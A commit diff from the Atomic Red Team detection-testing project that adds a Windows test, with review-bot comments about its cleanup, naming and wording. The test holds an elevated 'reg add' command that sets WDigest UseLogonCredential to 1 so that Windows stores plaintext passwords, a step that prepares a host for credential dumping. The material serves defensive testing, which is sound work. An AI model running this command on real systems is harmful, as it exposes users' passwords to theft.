Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2019-09-17 14:45:16 +00:00
parent 8b855a5139
commit ff779dd2fb
4 changed files with 41 additions and 0 deletions
+22
@@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text)
<br/>
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
<br/>
## Atomic Test #4 - Modify registry for password downgrade to plain text
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
<br/>
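Review bot: The cleanup command under "Cleanup Commands" writes `UseLogonCredential` back with `/d 0` unconditionally, so it does not restore whatever the host had before the test ran. A machine where the value was absent, or was already set to 1, ends up in a different state than it started in. Either state in the test description that cleanup forces the value to 0, or record the prior value before the `reg add` and restore that in cleanup.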
+1
@@ -282,6 +282,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)
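Review bot: The new index entry for Atomic Test #4 does not follow the naming of its neighbours. Tests #1 and #2 are title-cased and carry a "- cmd" suffix, while this one reads "Modify registry for password downgrade to plain text" with no suffix, even though its executor is also `command_prompt`. Since the index is generated, rename the test in the atomic YAML, for example "Modify Registry for Password Downgrade to Plain Text - cmd", and regenerate.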
+17
@@ -8156,6 +8156,23 @@ defense-evasion:
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry for password downgrade to plain text
description: "Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
\n"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f
'
T1170:
technique:
external_references:
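Review bot: The `description` of the new test is loosely worded: "windows" is lower-case, "clear text / cleartext" says the same thing twice, and it never names the value being changed, so a reader has to pull `UseLogonCredential` out of the `command` string. Suggest something like "Sets the WDigest UseLogonCredential registry value to 1 so that Windows stores plaintext passwords (making the system vulnerable to cleartext password dumping)".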
+1
@@ -89,6 +89,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)